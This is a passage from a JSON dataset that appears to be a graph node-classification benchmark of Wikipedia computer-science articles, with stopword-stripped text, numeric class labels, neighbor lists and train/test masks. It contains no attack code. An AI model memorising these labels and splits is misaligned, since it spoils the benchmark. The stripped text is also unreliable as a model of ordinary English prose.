comprehensive list modules found within software packages/archives readme.txt file addition nscd rrdtool requirement rrdtool aids creation graphs displayed octopussy dashboard shown per-device/per-service level octopussy receives syslog messages via syslog protocol therefore behaves passively running type network agent remote machines monitoring/surveillance octopussy completely conforms rfc 3164 rfc 3195 ietf describing syslog logging mechanism unix-like/bsd operating systems especially includes internal representation facility severity-principle applicable software driven semi-stateful event correlation engine means engine records thus knows internal state uses extent link together logically related elements device order draw conclusion i.e generate alert octopussy semi-stateful correlation engine called sliding window shifting window logical boundary number events certain period time capable comparing known past events present ones based limited number comparative values octo-dispatcher component used octopussy software receive syslog lines rsyslog dispatch device directories every device registered activated within octopussy gets syslog messages assigned depending device name noteworthy also adjacent octo-replay component program used octopussy software replay log messages device service receives processes recognized logs puts back incoming directory octo-parser octo-uparser two octopussy important core components octo-parser program used octopussy software parse logs syslog format device registered within octopussy basically uses regex-engine commences pattern matching incoming syslog messages octo-uparser restarted every time device services changed check previously received unknown log messages associated service cases octo-pusher also called advance process non-syslog messages incoming devices regard device setting asynchronous helpful process log messages sent octopussy server using e.g ftp rsync ssh/scp octopussy interface gui default user-interface provides configuration management device service management well alert definition therefore extends octopussy core components devices displayed tabular form devices page following descriptors minimum hostname ip address log type device model/type fqdn os hence interface octo-web mainly provides access octopussy core components like octo-commander octo-message-finder octo-reporter octo-statistic-reporter octopussy front-end/gui written perl 5 employing apache :asp structure display content addition octopussy core services also accessed operating system shell represents convenient way administrators start/stop services make fundamental configuration changes octopussy rrd graph generator core component software installed default since generation graphs resource intensive administrators may opt disable octopussy syslog server less powerful cpu low amount ram generated rrd graphs displays activity active services monitored devices highly depending specific service restart octopussy software operation octo-dispatcher octo-parser always process syslog messages buffer queue first rrd graph generation delayed octo-rrd depends octo-scheduler execute octopussy :report function order generate syslog activity rrd graphs scheduled previously finally octo-sender capability send report data arbitrary recipients plug-in/module system octopussy mainly geared towards modification octopussy reports plug-in consists description file defines plug-in name functions code file perl code process actual data also extensions software related octopussy like e.g nagios plug-in checks octopussy core services i.e octo-dispatcher octo-scheduler etc well octopussy parser states log partitions creation new services service patterns presents important way extend octopussy without making changes source code however since patterns outlined simplified regular expressions administrators least basic knowledge regex general strongly recommended build already existing services also understand meaning message objects basic fields message id pattern log level taxonomy table rank usually logs wizard used search system unrecognized syslog messages per device generate new service patterns process creation patterns way enables octopussy distinguish messages based severity taxonomy",
    "neighbors": [
      6273,
      10242,
      8582,
      9488,
      9233,
      1943,
      7325,
      7967,
      4640,
      11429,
      8998,
      2222,
      7983,
      823,
      1211,
      961,
      6482,
      11221,
      479,
      865,
      2281,
      7022,
      3827
    ],
    "mask": "Train"
  },
  {
    "node_id": 4034,
    "label": 4,
    "text": "Ambient_authority:ambient authority ambient authority term used study access control systems subject computer program said using ambient authority needs specify names involved object operation performed order permitted action succeed definition authority ambient sense exists broadly visible environment often necessarily global environment subject request name example suppose c program opens file read access executing call desired file designated name filesystem include authorising information program exercising ambient authority ambient authority requested permissions granted denied based one global properties executing program identity role cases management access control handled separately explicit communication executing program process means access control lists associated objects role-based access control mechanisms executing program means reify permissions granted specific purpose first-class values program able access object acting behalf acting behalf one clients behalf one client another way express intention inevitably leads programs subject confused deputy problem term ambient authority used primarily contrast capability-based security including object-capability models executing programs receive permissions might receive data communicated first-class object references allows determine permissions came thus avoid confused deputy problem however since additional requirements system considered capability system besides avoiding ambient authority non-ambient authority system synonym capability system ambient authority dominant form access control computer systems today user model access control used unix windows systems ambient authority model programs execute authorities user started means executing programs inevitably given permissions need task unable determine source number types permission program executing ambient authority access control model little option designate permissions try exercise hoping best property requires excess permissions granted users roles order programs execute without error",
    "neighbors": [
      256,
      7480,
      10146,
      10813,
      2951,
      4423,
      5503,
      5483,
      7884,
      11596,
      2737,
      10835,
      3700,
      10614,
      728,
      2585,
      6813,
      3999
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4035,
    "label": 9,
    "text": "State_logic:state logic state logic control system programming method created plcs state logic control system uses state transition diagram model reality thus using fundamentals finite-state machine theory basis programming language state logic enables users model application trying control using hierarchy consists tasks subdivided states described statements 'tasks description sequential activity model machines applications processes modelled state logic usually contain one 'task representing several different possibly parallel activities activities contain given number 'states finite-state machine theory one 'state active time certain inputs outputs cause transition different states given plcs usually control systems easily represented state transition diagram use high-level programming language state logic greatly helps plc programmer making intuitive control programs",
    "neighbors": [
      4770,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 4036,
    "label": 4,
    "text": "Custom_hardware_attack:custom hardware attack cryptography custom hardware attack uses specifically designed application-specific integrated circuits asic decipher encrypted messages mounting cryptographic brute force attack requires large number similar computations typically trying one key checking resulting decryption gives meaningful answer trying next key computers perform calculations rate millions per second thousands computers harnessed together distributed computing network number computations required average grows exponentially size key many problems standard computers fast enough hand many cryptographic algorithms lend fast implementation hardware i.e networks logic circuits also known gates integrated circuits ics constructed gates often execute cryptographic algorithms hundreds times faster general purpose computer ic contain large numbers gates hundreds millions 2005 thus decryption circuit cell replicated thousands times one ic communications requirements ics simple must initially loaded starting point key space situations comparison test value see known plaintext attack output consists signal ic found answer successful key since ics lend mass production thousands even millions ics applied single problem ics mounted printed circuit boards standard board design used different problems since communication requirements chips wafer-scale integration another possibility primary limitations method cost chip design ic fabrication floor space electric power thermal dissipation alternative approach use fpgas field-programmable gate arrays slower expensive per gate reprogrammed different problems copacobana cost-optimized parallel code breaker one machine consisting 120 fpgas type xilinx spartan3-1000 run parallel earliest custom hardware attack may bombe used recover enigma machine keys world war ii 1998 custom hardware attack mounted data encryption standard cipher electronic frontier foundation deep crack machine cost u.s. 250,000 build decrypted des challenge ii-2 test message 56 hours work confirmed des cracker copacobana machine cost-optimized parallel code breaker built 2006 unlike deep crack copacobana consist commercially available reconfigurable integrated circuits copacobana costs 10,000 build recover des key 6.4 days average cost decrease roughly factor 25 eff machine impressive example continuous improvement digital hardware adjusting inflation 8 years yields even higher improvement 30x since 2007 sciengines gmbh spin-off company two project partners copacobana enhanced developed successors copacobana 2008 copacobana rivyera reduced time break des current record less one day using 128 spartan-3 5000 generally believed large government code breaking organizations u.s. national security agency make extensive use custom hardware attacks examples declassified",
    "neighbors": [
      5090,
      8514,
      7556,
      9156,
      10658,
      11487,
      1770,
      4811,
      5355,
      3629,
      3886,
      7887,
      9932,
      2450,
      7699,
      4596,
      6268,
      2623
    ],
    "mask": "Test"
  },
  {
    "node_id": 4037,
    "label": 4,
    "text": "Richard_Thomas_(solicitor):richard thomas solicitor richard james thomas best known tenure information commissioner united kingdom post held december 2002 june 2009 time office raised concerns increased use closed-circuit television cctv introduction id cards uk thomas currently deputy chairman co-opted council member consumers association trustee director whitehall industry group chairman administrative justice tribunals council 1 september 2009 abolition august 2013 also visiting professor law northumbria university born june 1949 son magistrate thomas attended public school studied law southampton university late 1960s later awarded honorary doctor laws university early career worked articled clerk solicitor freshfields bruckhaus deringer 1971 citizens advice bureau notting hill 1974 went work legal public affairs positions national consumer council 1979 office fair trading national consumer council also involved campaign freedom information secondary involvement publishing book essays entitled consuming secrets appointment information commissioner first director public policy clifford chance married julia clarke since 1974 three adult children wife live reigate surrey thomas appointed commander order british empire cbe 2009 birthday honours public service document submitted leveson inquiry witness alec owens indicates richard thomas refused prosecute perpetrators phone hacking despite receiving recommendation parties identified involved jointly prosecuted 'conspiracy breach data protection act 1998",
    "neighbors": [
      5690,
      5133
    ],
    "mask": "Test"
  },
  {
    "node_id": 4038,
    "label": 0,
    "text": "Julia_Hirschberg:julia hirschberg julia hirschberg american computer scientist noted research computational linguistics natural language processing currently percy k. vida l. w. hudson professor computer science columbia university hirschberg received first ph.d degree history 16th-century mexico university michigan 1976 served history faculty smith college 1974 1982 subsequently shifted computer science studies receiving m.s computer information science university pennsylvania 1982 ph.d computer information science university pennsylvania 1985 upon graduation university pennsylvania 1985 hirschberg joined bell labs member technical staff linguistics research department worked improving prosody assignment text-to-speech synthesis tts bell labs tts system promoted department head 1994 created new human computer interface research lab department remained bell labs 1996 moved labs research part corporate reorganization 2002 joined columbia university faculty professor department computer science served chair computer science department 2012-2018 hirschberg research included prosody discourse structure spoken dialogue systems speech search recently analysis deceptive speech hirschberg among first combine natural language processing nlp approaches discourse dialogue speech research pioneered techniques text analysis prosody assignment text-to-speech synthesis bell laboratories 1980s 1990s developing corpus-based statistical models based upon syntactic discourse information general use today tts systems janet pierrehumbert developed theoretical model intonational meaning leader development tobi conventions intonational description extended numerous languages today widely used standard intonational annotation hirschberg pioneer together gregory ward much experimental work intonational sources language meaning interact pragmatic phenomena particularly meaning accent intonational prominent items meaning intonational contours also innovated numerous areas involving prosody meaning including role grammatical function surface position pitch accent location use prosody disambiguating cue phrases discourse markers diane litman role prosody disambiguation english italian spanish cinzia avesani pilar prieto automatic identification speech recognition errors using prosodic information labs worked fernando pereira steve whittaker others speech search developing new interfaces speech navigation columbia students continued extended research spoken dialogue systems automatically detecting speech recognition errors inappropriate system queries modeling turn-taking behavior dialogue entrainment modeling generating clarification dialogues automatic classification trust charisma deception emotion speech speech summarization prosody translation hedging behavior text speech text-to-speech synthesis speech search low resource languages also holds several patents tts speech search corpora collaborators collected include boston directions corpus columbia sri colorado deception corpus columbia games corpus served numerous technical boards editorial committees computing research association cra board directors serves co-chair cra-w. also noted leadership broadening participation computing served member cra committee status women computing research cra-w since 2010 hirschberg notable awards include",
    "neighbors": [
      7780,
      1890,
      2578,
      7724
    ],
    "mask": "Test"
  },
  {
    "node_id": 4039,
    "label": 3,
    "text": "Astra_Linux:astra linux astra linux russian linux-based computer operating system developed meet needs russian army armed forces intelligence agencies provides data protection level top secret russian classified information grade officially certified russian defense ministry federal service technical export control federal security service creator os scientific/manufacturing enterprise rusbitech applying solutions according russian government decree №2299-р 17/10/2010 orders federal authorities budget institutions implement free software usage os releases named hero cities russia cis one release general purpose code named oryol aimed achieving small mid-business goals releases marked special purpose — smolensk x86-64 pcs tula networking hardware novorossiysk arm mobile devices murmansk ibm system z mainframes rusbitech also manufactures soft/hardware trusted boot control module maksim-m1 м643м1 pci bus prevents unauthorized access offers raised digital security features module besides astra linux also supports oses linux kernel 2.6.x 5.x.x well several microsoft windows oses declared astra linux licenses correspond russian international laws n't contradict spirit demands gpl license system uses .deb packages astra linux considered recognized debian derivative rusbitech partnership relations linux foundation document foundation special edition version paid used many russian state-related organizations particularly used russian national center defence control talks deploy mass usage astra linux numerous state institutions republic crimea — legitimate usage popular oses questionable international sanctions ukrainian crisis also plans cooperation rusbitech huawei january 2018 announced astra linux going deployed russian army computers microsoft windows dropped february 2018 rusbitech announced ported astra linux russian-made elbrus microprocessors february 2019 astra linux announced implemented tianwan nuclear power plant china september 2019 commercial sales smartphones tablets astra linux expected start",
    "neighbors": [
      4611,
      3079,
      8713,
      3089,
      4113,
      4626,
      8209,
      8727,
      10780,
      543,
      11297,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      7224,
      8248,
      9276,
      10303,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      9309,
      4192,
      3685,
      10860,
      5742,
      2671,
      11388,
      2692,
      8837,
      9353,
      6797,
      7823,
      9873,
      11410,
      5267,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2737,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      4841,
      6890,
      7913,
      5356,
      6380,
      9964,
      7920,
      6898,
      5363,
      9461,
      1782,
      6393,
      5369,
      8957,
      4355,
      7435,
      2321,
      5397,
      6934,
      4887,
      8992,
      10530,
      6436,
      2853,
      3369,
      7983,
      823,
      3387,
      1853,
      3903,
      11587,
      2375,
      5959,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      11145,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      10156,
      1455,
      948,
      439,
      10694,
      5067,
      975,
      9689,
      2010,
      9693,
      485,
      4076,
      495,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 4040,
    "label": 2,
    "text": "ArkOS:arkos arkos linux distribution based arch linux designed primarily hosting web sites services cheap arm-based devices raspberry pi cubieboard 2 cubietruck beaglebone black plans expand platforms x86 jacob cook arkos primary developer originally conceived idea arkos realizing extensive amount time required set self-hosted services explained saying good deal experience linux system administration still took huge amount time research get services wanted set secured properly cook aims reduce dependence cloud services make data collection harder march 2014 arkos developing stages creator arkos also set citizenweb organization responsible development operating system citizenweb also solicited money successful crowdsourcing campaign finish platform april 2017 arkos discontinued lack resources principal reason source code remains available github",
    "neighbors": [
      10254,
      6675,
      7187,
      10776,
      25,
      10780,
      4637,
      3618,
      9762,
      5158,
      7217,
      9784,
      10809,
      576,
      10817,
      10333,
      97,
      4194,
      8298,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150,
      2179,
      7812,
      10883,
      8326,
      6797,
      2195,
      9366,
      6296,
      7325,
      1694,
      9887,
      3248,
      6837,
      8388,
      9932,
      5840,
      7382,
      8410,
      1761,
      1253,
      4841,
      9964,
      5363,
      2811,
      7938,
      10499,
      4360,
      1804,
      273,
      11539,
      1813,
      10016,
      2345,
      7983,
      823,
      1849,
      4409,
      7483,
      11075,
      4423,
      5457,
      11601,
      10590,
      8551,
      5492,
      394,
      3978,
      4493,
      7057,
      11155,
      11667,
      8092,
      421,
      4011,
      9646,
      11184,
      6075,
      9660,
      6078,
      9151,
      4040,
      8136,
      5067,
      8147,
      11221,
      6128,
      5619,
      10235
    ],
    "mask": "None"
  },
  {
    "node_id": 4041,
    "label": 4,
    "text": "Cellebrite:cellebrite cellebrite mobile synchronization israeli company manufactures data extraction transfer analysis devices cellular phones mobile devices company subsidiary japan sun corporation cellebrite headquartered petah tikva israel two subsidiary companies cellebrite usa corp. cellebrite gmbh respectively based parsippany new jersey us munich germany cellebrite fully owned subsidiary sun corporation publicly traded company listed jasdaq 6736/jq based nagoya japan 2017 cellebrite mobile lifecycle division rebranded mobilogy mobilogy produces hardware software phone-to-phone data transfer backup mobile applications electronic software distribution data analysis tools mobilogy products used various mobile operators deployed wireless retail points sale mobilogy works handset manufacturers ensure compatibility devices released public cellebrite mobile forensics division established 2007 produces software hardware mobile forensics purposes used federal state local law enforcement intelligence agencies military branches corporate security investigations law firms private digital forensic examiners cellebrite established israel 1999 avi yablonka yaron baratz yuval aflalo ron serber joined cellebrite dec 2000 vp r yossi carmil aug.2004 ceo later ron yossi share ceo title co-ceo cellebrite first manufactured hardware software offered compressive phone-to-phone data transfer devices offered contact synchronization content transfer tools mobile phones intended use wireless carrier sales support staff retail stores initially cellebrite commercial products used tool migration is-95 cdma enabled mobile phones gsm standard later cellebrite wireless carriers retailers universal memory exchanger ume gained additional data extraction transfer capabilities well additional mobile phone diagnostics backup application management delivery 2007 cellebrite established independent division targeted mobile forensics industry cellebrite mobile forensics introduced mobile forensics products 2007 family brand name 'universal forensic extraction device ufed ability extract physical logical data mobile devices cellular phones hand-held mobile devices including ability recover deleted data decipher encrypted password protected information also 2007 cellebrite acquired futuredial incorporated one major shareholders sun corporation japan today fully owned subsidiary sun corporation april 2011 michigan chapter american civil liberties union questioned whether michigan state police msp troopers using cellebrite ufeds conduct unlawful searches citizens cell phones following refusal grant mclu 2008 freedom information act request unless organization paid 544,000 retrieve reports msp issued statement claiming honored fourth amendment searching mobile devices march 2016 reported cellebrite offered unlock iphone involved fbi–apple encryption dispute later fbi announced successfully accessed iphone thanks third party press report claimed cellebrite assisted unlocking device fbi source denied 2017 data dump suggests cellebrite sold data extraction products turkey united arab emirates russia mobile retail industry cellebrite provides gadgets phone-to-phone content management transfer used primarily stand-alone device point sale electronic software distribution content backup management used primarily over-the-air programming cellebrite universal memory exchanger ume standalone phone-to-phone memory transfer backup machine transfers content including pictures videos ringtones sms phone book contact data cellebrite ume touch predecessor ume-36 intermediate information range mobile phones smartphones pdas support mobile operating systems including symbian windows mobile palm blackberry ios android cellebrite ume standalone device acts universal data channel two mobile devices extracts reads parses data source mobile device transfers on-the-fly target device without storing data ume device ume automatically determine types phones connected re-structure data fly according source target phone storage formats data fields addition apploader device analytics tools may 2012 cellebrite introduced several new retail products services including pos diagnostics tool cell phone buy-back program integration ume touch self-service point 2007 cellebrite announced line products called 'universal forensic extraction device ufed aimed digital forensics investigation industry ufed system hand-held device optional desktop software data cables adapters peripherals ufed additionally integrated subscriber identity module sim reader unlike commercial counterpart ume ufed system sold approved government corporate organizations also unlike ume ufed extracts mobile device data directly onto sd card usb flash drive another major difference ume ufed ability break codes decipher encrypted information acquire hidden deleted data ufed named phone forensic hardware tool year four years running forensic 4cast awards cellebrite claims ufed ability extract data nearly 8,200 devices june 2012 include smartphones pda devices cell phones gps devices tablet computers ufed extract decrypt parse analyze phonebook contacts types multimedia content sms mms messages call logs electronic serial numbers esn international mobile equipment identity imei sim location information non-volatile memory volatile storage alike ufed supports cellular protocols including cdma gsm iden tdma also interface different operating systems file systems ios android os blackberry symbian windows mobile palm well legacy feature cell phones operating systems ufed enables retrieval subject data via logical see get file system e.g. directories files physical extractions i.e hex dump bit-for-bit copy mobile device entire storage physical extraction enables recover deleted information decipher encrypted data acquire information password-protected mobile applications facebook skype whatsapp browser-saved passwords ufed physical extraction functionality also overcome devices password locks well sim pin numbers cellebrite claims first mobile forensics industry achieved number smartphone forensic breakthroughs include physical extraction decoding blackberry flash memory going beyond mass storage ipd backups android user/pattern lock bypass physical extraction decoding physical extraction phones chinese chipsets including mediatek spreadtrum tomtom gps trip-log decryption decoding ios device unlocking research development cellebrite claims maintain integrity digital evidence 12 january 2017 reported unknown hacker acquired 900 gb worth confidential data cellebrite external servers data dump includes alleged usernames passwords logging cellebrite databases connected company my.cellebrite domain also contains appear evidence files seized mobile phones logs cellebrite devices data suggests cellebrite sold data extraction products countries turkey united arab emirates russia",
    "neighbors": [
      2208,
      9762,
      5475,
      8237,
      9038,
      3703,
      6424,
      2811
    ],
    "mask": "Test"
  },
  {
    "node_id": 4042,
    "label": 9,
    "text": "Fourth-generation_programming_language:fourth-generation programming language fourth-generation programming language 4gl computer programming language belongs class languages envisioned advancement upon third-generation programming languages 3gl programming language generations aims provide higher level abstraction internal computer hardware details making language programmer-friendly powerful versatile definition 4gl changed time typified operating large collections information rather focusing bits bytes languages claimed 4gl may include support database management report generation mathematical optimization gui development web development researchers state 4gls subset domain-specific languages concept 4gl developed 1970s 1990s overlapping development 3gl 3gls like c c++ c java javascript remain popular wide variety uses 4gls originally defined found narrower uses advanced 3gls like python ruby perl combine 4gl abilities within general-purpose 3gl environment also libraries 4gl-like features developed add-ons popular 3gls blurred distinction 4gl 3gl 1980s 1990s efforts develop fifth-generation programming languages 5gl though used earlier papers discussions term 4gl first used formally james martin 1981 book applications development without programmers refer non-procedural high-level specification languages primitive way early 4gls included informatics mark-iv 1967 product sperry mapper 1969 internal use 1979 release motivations '4gl inception continued interest several term apply large set software products also apply approach looks greater semantic properties implementation power 3gl offered greater power programmer 4gl open development environment wider population early input scheme 4gl supported entry data within 72-character limit punched card 8 bytes used sequencing card tag would identify type function judicious use cards 4gl deck could offer wide variety processing reporting capability whereas equivalent functionality coded 3gl could subsume perhaps whole box cards 72-character metaphor continued hardware progressed larger memory terminal interfaces even limitations approach supported highly sophisticated applications interfaces improved allowed longer statement lengths grammar-driven input handling greater power ensued example described nomad page development 4gl influenced several factors hardware operating system constraints large weight 4gl first introduced disparate mix hardware operating systems mandated custom application development support specific system order ensure sales one example mapper system developed sperry though roots back beginning system proven successful many applications ported modern platforms latest variant embedded bis offering unisys mark-iv known vision builder offered computer associates santa fe railroad used mapper develop system project early example 4gl rapid prototyping programming users idea easier teach railroad experts use mapper teach programmers intricacies railroad operations one early portable languages 4gl properties ramis developed gerald c. cohen mathematica mathematical software company cohen left mathematica founded information builders create similar reporting-oriented 4gl called focus later 4gl types tied database system far different earlier types use techniques resources resulted general improvement computing time interesting twist 4gl scene realization graphical interfaces related reasoning done user form 'language poorly understood number different types 4gls exist 4gls integrated tools allow easy specification required information twenty-first century 4gl systems emerged low code environments platforms problem rapid application development short periods time vendors often provide sample systems crm contract management bug tracking development occur little programming extract data files database create reports wide range formats done report generator tools",
    "neighbors": [
      6147,
      4614,
      9224,
      1039,
      5651,
      3613,
      9245,
      8225,
      5677,
      5678,
      5680,
      9780,
      1591,
      10819,
      8262,
      5703,
      3159,
      7771,
      2652,
      9330,
      9331,
      7797,
      8312,
      9345,
      2691,
      3230,
      7326,
      4770,
      7341,
      10413,
      11450,
      9915,
      1215,
      191,
      5830,
      9926,
      1224,
      5838,
      5845,
      8411,
      7395,
      4838,
      2804,
      7930,
      7421,
      6403,
      2317,
      284,
      11555,
      4388,
      5415,
      305,
      1841,
      313,
      4410,
      4412,
      1856,
      3904,
      2374,
      5450,
      11085,
      2901,
      3414,
      2398,
      8554,
      8556,
      2929,
      1917,
      3462,
      8582,
      2441,
      8079,
      6032,
      5527,
      7576,
      9626,
      7580,
      10672,
      3515,
      6598,
      2002,
      987,
      477,
      6112,
      9209,
      2043,
      2556,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 4043,
    "label": 3,
    "text": "Chase_H.Q.:chase h.q game well received gaming industry resulting three arcade-based sequels released special criminal investigation 1989 1992 chase h.q 2 2007 two spin-offs also released crime city 1989 quiz h.q 1990 game ported many home computers ocean software 1989 including versions zx spectrum amstrad cpc commodore 64 msx amiga atari st. taito produced versions family computer 1989 game boy 1990 master system 1990 turbografx-16 1990 game gear 1991 saturn 1996 released playstation 2 japan 2007 part taito memories ii volume 2 start level player informed pursuing great distance away must apprehend criminal time limit expires criminal car constantly moving away player repeatedly crashes drives slowly criminal escape points game road splits correct turn must taken otherwise take longer catch criminal vehicle reached time limit extended vehicle must rammed number times criminal forced stop arrested game includes five levels initial time limit reach criminal time extension ram criminal 60 65 70 seconds nancy chase hq start every level calls radio frequency always 144.x various mhz actually 2-meter band amateur ham radio frequencies although superficially similar technology sega run chase hq features significant technical advancements title presentation perspective hills track splits villains arcade versions last villain car always listed unidentified ocean released versions game zx spectrum amstrad cpc commodore 64 commodore amiga atari st december 1989 msx version released february 1990 spain roughly one month later launch rest ocean versions market taito produced ports known taito chase h.q family computer 1989 game boy 1990/1991 master system 1990 turbografx-16 1990 game gear 1991 released genesis chase h.q ii known super h.q japan minor changes including alternative player vehicles december 1990 game included wheels fire compilation also featured hard drivin power drift turbo outrun june 1991 game released power compilation also featured altered beast turrican rainbow islands x-out 1993 taito released super chase h.q known japan super h.q criminal chaser super nes unlike home versions played first person perspective based upon super chase criminal termination rather original chase h.q gameplay modeled original aspects s.c.i incorporated also super chase h.q game boy released exclusively north america 1994 game similar game boy taito chase h.q 1991 1996 taito released emulation arcade original sega saturn japan bundled together special criminal investigation one disc 2000 chase h.q secret police released game boy color july 2008 turbografx-16 version game re-released wii virtual console spin-off released 1989 titled crime city game play deviates traditional third-person driving instead side scrolling type shooter game well received critics upon release arcades computer video games gave positive review stating last racing game something whizzing around track beat course time concluded fast challenging great graphics good clear sound effects definitely winner ace said run theme keeps expanded presented different ways like power drift chase hq best far concluded game driving violence winning coin-up combination crash said great game ultimate arcade version cops-and-robbers movies according arcade history arguably first sprite-scaled racer since run truly capture gaming public imagination home computer conversions also mostly well received critics 16-bit amiga atari st versions received positive reviews 8-bit zx spectrum amstrad cpc conversions received high review scores generally recognised accurate playable ocean software home computer releases three zx spectrum magazines awarded 94 praising speed game originality crash gave game 95 sinclair user awarded 96 hand 8-bit commodore 64 conversion received generally negative reception japan 1989 arcade version nominated hit game year voted 10th place according ocean software advert 1989 arcade version voted arcade game year 1989/1990 golden joystick awards 8-bit home computer versions awarded best 8-bit coin-op conversion best 8-bit soundtrack spectrum version also topped computer video games best games '89 list along super mario bros. 2 zx spectrum version game went number 2 uk sales charts behind rainbow islands spectrum version voted number 1 sinclair poll readers top 100 games time 1993 brian kuh weirs beach new hampshire holds official arcade world record score 3,596,680 points achieved 1 june 2006 funspot family fun center weirs beach new hampshire robert gray dumfriesshire scotland holds official mame world record score 11,490,280 points achieved 13 june 2010 chase h.q successful enough earn two arcade-based sequels widely released special criminal investigation released 1989 extremely rare super chase criminal termination released 1992 also earned two spin-offs run gun crime city quiz game quiz h.q. special criminal investigation expands original addition guns passenger rise t-top nissan 300zx z32 shoot oncoming targets take advantage enemies placed throughout level attempt shoot ram player attempt pursue main criminal deviating relatively realistic tracks offer original sequel features pursuits waterfalls unfinished sections elevated highway. third arcade release chase h.q series released 1992 1997 playstation game ray tracers developed released taito described less follow game differences different speed-boost system greater variety targets february 2006 chase h.q nancy yori kinkyuu renraku presented arcade operator union trade show tokyo game released chase h.q 2 later year saint etienne recorded demo dance track called chase hq inspired chase h.q includes samples oh man punch pedal exclamations game action track released bonus track 2009 deluxe reissue band 1991 album foxbase alpha chase hq gameplay involved ramming enemy car avoiding oncoming traffic cited precursor gameplay later titles driver burnout",
    "neighbors": [
      801,
      8709,
      8300,
      8492,
      9006,
      10316,
      4690,
      629,
      6390,
      9501,
      5275,
      1693,
      4894
    ],
    "mask": "None"
  },
  {
    "node_id": 4044,
    "label": 7,
    "text": "Google_Cloud_Dataflow:google cloud dataflow google cloud dataflow fully managed service executing apache beam pipelines within google cloud platform ecosystem google cloud dataflow announced june 2014 released general public open beta april 2015 january 2016 google donated underlying sdk implementation local runner set ios data connectors access google cloud platform data services apache software foundation donated code formed original basis beam project",
    "neighbors": [
      4995,
      5892,
      7816,
      5262,
      8719,
      5524,
      7700,
      10645,
      8858,
      1435,
      10525,
      10912,
      2978,
      4901,
      1959,
      3499,
      10284,
      1203,
      5431,
      7359,
      196,
      3269,
      3782,
      11590,
      4683,
      11343,
      3664,
      3795,
      1240,
      8413,
      6367,
      2658,
      6632,
      5483,
      236,
      9712,
      9970,
      8821,
      3836
    ],
    "mask": "Test"
  },
  {
    "node_id": 4045,
    "label": 9,
    "text": "JSON_Patch:json patch json patch web standard format describing changes json document meant used together http patch allows modification existing http resources json patch media type codice_1 json patch document structured json array objects object contains one six json patch operations add remove replace move copy test structure influenced specification xml patch syntax looks like every object two mandatory members op path one operation per object though many objects/operations every array operations performed order first operation array goes first second operation acts upon result previous operation json patch documents atomic one operation document fails operation carried operations following add adds value object array remove removes value object array replace replaces value logically identical using remove add copy copies value one path another adding value specified location another location move moves value one place another removing one location adding another test tests equality certain path certain value",
    "neighbors": [
      803,
      6920,
      3921,
      4797,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 4046,
    "label": 3,
    "text": "Philips_68070:philips 68070 scc68070 philips semiconductors-branded motorola 68000-based 16/32-bit processor produced license marketed externally high-performance microcontroller almost exclusively used combined philips scc66470 vsc video- systems controller philips cd-i interactive entertainment product line additions motorola 68000 core include differences motorola 68000 core include scc68070 mostly binary compatible motorola 68000 equivalent chip motorola 680x0 series particular scc68070 follow-on motorola 68060 even though scc68070 32-bit processor internally 24-bit address bus giving theoretical 16mb maximum ram however possible on-board peripherals mapped internally",
    "neighbors": [
      5348,
      7269,
      1158,
      7302,
      11447,
      2383,
      8917,
      1463,
      2073
    ],
    "mask": "Train"
  },
  {
    "node_id": 4047,
    "label": 3,
    "text": "3DO_Blaster:3do blaster 3do blaster add-on produced creative labs designed allow compatible windows-based pcs play games 3do interactive multiplayer full-sized isa compatibility card unlike add-ons emulate 3do system rather whole system logic board included input controllers output video audio redirected pc product marketed single board cd-rom drive owners drives panasonic interface bundled necessary cd-rom drive software drivers allowed dos windows 3.1 based gameplay although windows based gaming featured real-time stretching game window screenshot capturing graphics boards time 1994 par system needs pass-through using vga feature connector link used thus reserving area screen used 3do blaster card output windows environment – running dos full-screen option thus impact cpu first 3do system panasonic real fz-1 fmv daughter-card enabling video cd playback planned since 3do blaster failed achieve momentum never released saved games stored nvram card supposedly using resources pc prevent hacking card sold cables needed 3do controller logitech two 3do games cd shock wave electronic arts gridders tetragon despite showing 'long boxes two games back packing box included jewel cases third cd containing demos popular 3do games also included included software aldus aldus photostyler se aldus gallery effects vol 1 pictures titles seen back 3do blaster packing box",
    "neighbors": [
      9641,
      6797,
      8561,
      5368,
      2941
    ],
    "mask": "None"
  },
  {
    "node_id": 4048,
    "label": 8,
    "text": "Blink_(browser_engine):blink browser engine blink browser engine used google chrome browser many projects developed part chromium project contributions google facebook microsoft opera software asa adobe systems intel ibm samsung others first announced april 2013 blink fork webcore component webkit originally fork khtml kjs libraries kde used chrome starting version 28 opera 15+ vivaldi amazon silk chromium-based browsers frameworks much webcore code used features google chrome implemented differently sandboxing multi-process model parts altered blink fork although made slightly bulkier allowed greater flexibility adding new features future fork also deprecates vendor prefixes existing prefixes phased new experimental functionality instead enabled opt-in basis aside planned changes blink initially remains relatively similar webcore commit count google largest contributor webkit code base since late 2009 blink naming influenced non-standard presentational blink html element introduced netscape navigator supported presto- gecko-based browsers august 2013 blink contrary name never functionally supported element several projects exist turn chromium blink reusable software framework developers chromium blink implemented six platforms windows mac linux chrome os android android webview ios versions chromium continue use parent renderer webkit webcore",
    "neighbors": [
      513,
      6657,
      9736,
      8719,
      2579,
      7700,
      6171,
      9757,
      10270,
      7713,
      10791,
      9770,
      10284,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      4683,
      5707,
      11343,
      3664,
      10834,
      6231,
      8281,
      6747,
      2658,
      9320,
      1642,
      9834,
      9841,
      115,
      9843,
      8821,
      4728,
      637,
      1664,
      2182,
      7816,
      5262,
      8858,
      10910,
      8351,
      7340,
      7346,
      1203,
      9394,
      9908,
      185,
      11449,
      4797,
      7359,
      196,
      3269,
      3782,
      11466,
      7885,
      11469,
      9424,
      3795,
      4310,
